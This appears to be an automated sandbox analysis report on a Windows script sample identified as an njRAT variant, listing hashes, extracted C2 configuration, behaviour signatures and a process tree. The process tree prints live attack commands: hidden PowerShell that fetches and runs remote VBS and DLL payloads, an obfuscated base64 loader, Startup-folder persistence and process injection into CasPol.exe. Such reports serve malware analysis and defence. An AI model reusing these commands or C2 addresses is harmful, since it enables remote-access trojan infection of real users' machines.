Analysis
-
max time kernel
104s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
22/09/2022, 18:00
Static task
static1
Behavioral task
behavioral1
Sample
e4fbe2c0de215885d004f354f1e57357.wsf
Resource
win7-20220901-en
General
-
Target
e4fbe2c0de215885d004f354f1e57357.wsf
-
Size
53KB
-
MD5
e4fbe2c0de215885d004f354f1e57357
-
SHA1
258f167a93a3f51fee1e05f6d401661b5ea63bd3
-
SHA256
ce6cdc61e1758c5abd949a017475171aea3dbd9571d45300990badd6006759c4
-
SHA512
a3c1c60d641226aef13be04eda4c3e30e8a0b658e5bae65b4b3a7beba692dd57e63e5d451169d10e2f535414855be26767657ca6e08164e9f609e7f74f749023
-
SSDEEP
192:L48w8Nlb0bqGW6CCCuqpS848w8Nlb0bqGW6CCCuqpd48w8Nlb0bqGW6CCCuqpJ:dwSb0cJqiwSb0cJzwSb0cJR
Malware Config
Extracted
http://5.42.199.120/dll/lannodll.txt
Extracted
njrat
0.7NC
NYAN CAT
wins2109ok.duckdns.org:8000
cfe0aa9d35c
-
reg_key
cfe0aa9d35c
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 1884 powershell.exe 12 1224 powershell.exe 13 1224 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1224 set thread context of 1344 1224 powershell.exe 91 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1884 powershell.exe 1884 powershell.exe 3760 powershell.exe 3760 powershell.exe 1224 powershell.exe 1224 powershell.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 3760 powershell.exe Token: SeDebugPrivilege 1224 powershell.exe Token: SeDebugPrivilege 1344 CasPol.exe Token: 33 1344 CasPol.exe Token: SeIncBasePriorityPrivilege 1344 CasPol.exe Token: 33 1344 CasPol.exe Token: SeIncBasePriorityPrivilege 1344 CasPol.exe Token: 33 1344 CasPol.exe Token: SeIncBasePriorityPrivilege 1344 CasPol.exe Token: 33 1344 CasPol.exe Token: SeIncBasePriorityPrivilege 1344 CasPol.exe Token: 33 1344 CasPol.exe Token: SeIncBasePriorityPrivilege 1344 CasPol.exe Token: 33 1344 CasPol.exe Token: SeIncBasePriorityPrivilege 1344 CasPol.exe Token: 33 1344 CasPol.exe Token: SeIncBasePriorityPrivilege 1344 CasPol.exe Token: 33 1344 CasPol.exe Token: SeIncBasePriorityPrivilege 1344 CasPol.exe Token: 33 1344 CasPol.exe Token: SeIncBasePriorityPrivilege 1344 CasPol.exe Token: 33 1344 CasPol.exe Token: SeIncBasePriorityPrivilege 1344 CasPol.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4600 wrote to memory of 1884 4600 WScript.exe 79 PID 4600 wrote to memory of 1884 4600 WScript.exe 79 PID 1884 wrote to memory of 4640 1884 powershell.exe 81 PID 1884 wrote to memory of 4640 1884 powershell.exe 81 PID 1132 wrote to memory of 2080 1132 explorer.exe 83 PID 1132 wrote to memory of 2080 1132 explorer.exe 83 PID 2080 wrote to memory of 3760 2080 WScript.exe 84 PID 2080 wrote to memory of 3760 2080 WScript.exe 84 PID 3760 wrote to memory of 1224 3760 powershell.exe 86 PID 3760 wrote to memory of 1224 3760 powershell.exe 86 PID 1224 wrote to memory of 1344 1224 powershell.exe 91 PID 1224 wrote to memory of 1344 1224 powershell.exe 91 PID 1224 wrote to memory of 1344 1224 powershell.exe 91 PID 1224 wrote to memory of 1344 1224 powershell.exe 91 PID 1224 wrote to memory of 1344 1224 powershell.exe 91 PID 1224 wrote to memory of 1344 1224 powershell.exe 91 PID 1224 wrote to memory of 1344 1224 powershell.exe 91 PID 1224 wrote to memory of 1344 1224 powershell.exe 91 PID 1344 wrote to memory of 2116 1344 CasPol.exe 96 PID 1344 wrote to memory of 2116 1344 CasPol.exe 96 PID 1344 wrote to memory of 2116 1344 CasPol.exe 96
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4fbe2c0de215885d004f354f1e57357.wsf"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1022146310729650249/1022278336447262750/Crpted55.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ØØªÙ…ذمیص.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ØØªÙ…ذمیص.wsf');Start-Sleep 1;rm *.vbs,*.wsf2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs3⤵PID:4640
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE4AWQBnAE8AeABSAF凸凸凸A凸凸凸AAlACcAOwBbAEIAeQB0AG凸凸凸AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG凸凸凸AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA凸凸凸wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG凸凸凸AdAAuAFcAZQBiAEMAbABpAG凸凸凸AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA凸凸凸wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADEAOQA5AC4AMQAyADAALwBkAGwAbAAvAGwAYQBuAG4AbwBkAGwAbAAuAHQAeAB0ACcAKQApADsAWwBzAHkAcwB0AG凸凸凸AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH凸凸凸ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG凸凸凸AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAwADAAMAA4AGsAbwA5ADAAMQAyAC8AOAA0ADgAMwA0ADkAMwAzADcAMAA2ADgAOAAyADkAMQAyADAAMQAvADEANwA1ADMANQAwADcAMgA4AD凸凸凸ANgA2ADcAMgA5ADEAMgAwADEALwBzAHQAbgBlAG0AaABjAGEAdAB0AGEALwBtAG8AYwAuAHAAcABhAGQAcgBvAGMAcwBpAGQALgBuAGQAYwAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC0GKgZFBjAGRQbMBj凸凸凸GJwAgACkAKQA=';$OWjuxDt = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('凸凸凸','U') ) );$OWjuxDt = $OWjuxDt.replace('%NYgOxRUP%', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxDt3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://5.42.199.120/dll/lannodll.txt'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.0008ko9012/8483493370688291201/1753507285667291201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'حتمذمیص' ))"4⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\SysWOW64\cmd.execmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:2116
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
1KB
MD54aaea8e990963328115bd59dee2bcda8
SHA12d7eed0a0a898811d6a149a4545ab3732477c01a
SHA256d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc
SHA512de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50
-
Filesize
153KB
MD5a0fa641e1fe743aa44d0b42c25243143
SHA15db55be1cbe8e19f55671e18ca2741e9a5d61c48
SHA2563e2e52d83f938c4bbe67d9369bb29866153ecc846aa7e9761e73dbfaa8a26041
SHA512e3f103df2bdc9590e738141159da75d63b9e61e60c85df689986157339641761c2269dd29fdbdea8838eaeec8c2569320682501a2df019f08222c8489110de4d